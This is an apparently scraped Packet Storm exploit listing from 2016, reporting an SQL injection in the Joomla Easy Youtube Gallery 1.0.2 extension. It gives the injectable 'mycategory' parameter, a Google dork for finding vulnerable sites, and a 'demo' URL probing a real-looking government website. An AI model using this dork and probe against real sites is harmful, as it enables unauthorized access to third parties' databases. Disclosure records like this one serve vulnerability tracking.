Joomla Easy Youtube Gallery 1.0.2 SQL Injection

2016-03-23T00:00:00
ID PACKETSTORM:136349
Type packetstorm
Reporter T3NZOG4N
Modified 2016-03-23T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://extensions.joomla.org/extension/easy-youtube-gallery  
# Google Dork : inurl:com_easy_youtube_gallery mycategory   
# Date: 2016/03/22  
# Version: 1.0.2  
######################  
# PoC:  
# mycategory=[SQL]  
#   
# Demo:  
# http://www.onkoloji.gov.tr/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752  
#  
######################  
# Discovered by :  
# Mojtaba MobhaM (kazemimojtaba@live.com)  
# T3NZOG4N (t3nz0g4n@yahoo.com)  
# Homepage : persian-team.ir  
# Greetz : Milad_Hacking & FireKernel And You  
######################   
`